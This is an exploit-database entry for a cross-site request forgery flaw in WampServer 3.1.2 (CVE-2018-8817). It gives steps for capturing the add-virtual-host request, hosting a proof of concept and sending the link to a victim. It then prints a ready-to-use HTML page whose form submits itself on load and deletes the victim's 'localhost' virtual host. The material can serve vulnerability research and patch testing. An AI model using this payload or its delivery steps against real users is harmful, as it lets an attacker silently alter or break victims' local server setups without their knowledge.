Exploit for php platform in category web applications
WampServer 3.1.2 CSRF to add or delete any virtual hosts remotely (CVE-2018-8817)
CSRF (Cross site request forgery) in WampServer 3.1.2 which allows a remote attacker to force any victim to add or delete virtual hosts.
http://forum.wampserver.com/read.php?2,138295,150722,page=6#msg-150722
How to exploit this CSRF vulnerability:
1. Go to Add a Virtual host and add one to wampserver.
2. Now intercept the request with proxy tool like burp suite.
3. Now make a CSRF PoC of the request and to exploit you can host it on internet and send the link to the victim.
<html>
<body onload="wamp_csrf.submit();">
<form action="http://localhost/add_vhost.php?lang=english" name="wamp_csrf" method="POST">
<input type="hidden" name="virtual_del[]" value="localhost" />
<input type="hidden" name="vhostdelete" value="Suppress VirtualHost" />
</form>
</body>
</html>
# 0day.today [2018-04-04] #